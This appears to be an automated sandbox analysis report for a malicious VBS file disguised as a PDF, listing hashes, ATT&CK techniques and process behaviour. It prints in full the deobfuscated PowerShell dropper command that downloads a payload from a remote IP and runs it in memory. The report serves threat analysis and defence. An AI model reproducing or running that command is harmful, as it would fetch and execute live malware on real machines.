e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9

Analysis

max time kernel
43s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
27-09-2022 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TV06KSFYOU_002_PDF.vbs
Size

577KB
MD5

92be06b804449682d272f3afc76aca5f
SHA1

f575b8712aa0f0720b6ad981ca8bbe682badd1d8
SHA256

e596d827af9b25d8348caffa981f5ef4a6ea88bfcfb35e5a5d2d337d6bf90aa9
SHA512

09b067ad4507a7efbd075a3d8400e63627d62d4bf9e542fb527755eac71240e556ae9b4f45e408e2b4d9dfe42688c18b9dd0a4007ca23dc77d8d16449808068c
SSDEEP

96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHA:cKLosxvRG

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 936 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

936 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 936 powershell.exe

flow	pid	process
3	936	powershell.exe

pid	process
936	powershell.exe

description	pid	process
Token: SeDebugPrivilege	936	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1964 wrote to memory of 936	1964	WScript.exe	powershell.exe
PID 1964 wrote to memory of 936	1964	WScript.exe	powershell.exe
PID 1964 wrote to memory of 936	1964	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TV06KSFYOU_002_PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdbd2471442d-d42a-e044-ff2d-d8c5491d=nekot&aidem=tla?txt.hdcnysaer/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/936-55-0x0000000000000000-mapping.dmp

Download
memory/936-57-0x000007FEF4460000-0x000007FEF4E83000-memory.dmp

Filesize
10.1MB

Download
memory/936-59-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/936-58-0x000007FEF3900000-0x000007FEF445D000-memory.dmp

Filesize
11.4MB

Download
memory/936-60-0x000000001B700000-0x000000001B9FF000-memory.dmp

Filesize
3.0MB

Download
memory/936-61-0x000000000244B000-0x000000000246A000-memory.dmp

Filesize
124KB

Download
memory/936-62-0x0000000002444000-0x0000000002447000-memory.dmp

Filesize
12KB

Download
memory/936-63-0x000000000244B000-0x000000000246A000-memory.dmp

Filesize
124KB

Download
memory/1964-54-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

Filesize
8KB

Download